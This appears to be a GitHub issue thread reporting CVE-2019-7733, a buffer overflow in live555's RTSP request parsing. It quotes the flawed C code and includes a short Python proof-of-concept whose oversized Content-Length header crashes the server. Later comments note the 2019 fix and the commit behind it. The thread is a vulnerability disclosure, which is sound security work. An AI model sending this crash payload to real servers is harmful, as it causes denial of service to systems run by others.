live555
live555 copied to clipboard
There is a buffer overflow which can lead to dos in live555 v0.95
When parse the request packet in function handleRequestBytes, the code don't check the content-length
, and use it in memmove. Finally cause the buff overflow.
unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
resetRequestBuffer(); // to prepare for any subsequent request
if (numBytesRemaining > 0) {
memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
newBytesRead = numBytesRemaining;
}
There is a content-length
check, but it only assigns parseSucceeded
to false.
This can't avoid the memmove
.
Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
cmdName, sizeof cmdName,
urlPreSuffix, sizeof urlPreSuffix,
urlSuffix, sizeof urlSuffix,
cseq, sizeof cseq,
sessionIdStr, sizeof sessionIdStr,
contentLength);
fLastCRLF[2] = '\r'; // restore its value
// Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
parseSucceeded = False;
}
I can make the server crash with a simple packet.
from pwn import *
p1 = remote("IP", Port)
pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
pl += "Content-Length: 4294927296\r\n\r\n"
p1.send(pl)
This was assigned CVE-2019-7733.
This was addressed in 2019.05.12, please close.
http://www.live555.com/liveMedia/public/changelog.txt
This was addressed in 2019.05.12, please close.
http://www.live555.com/liveMedia/public/changelog.txt
Could you kindly point me to the commit that fixed the issue ? Thanks :)
This was addressed in 2019.05.12, please close. http://www.live555.com/liveMedia/public/changelog.txt
Could you kindly point me to the commit that fixed the issue ? Thanks :)
@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.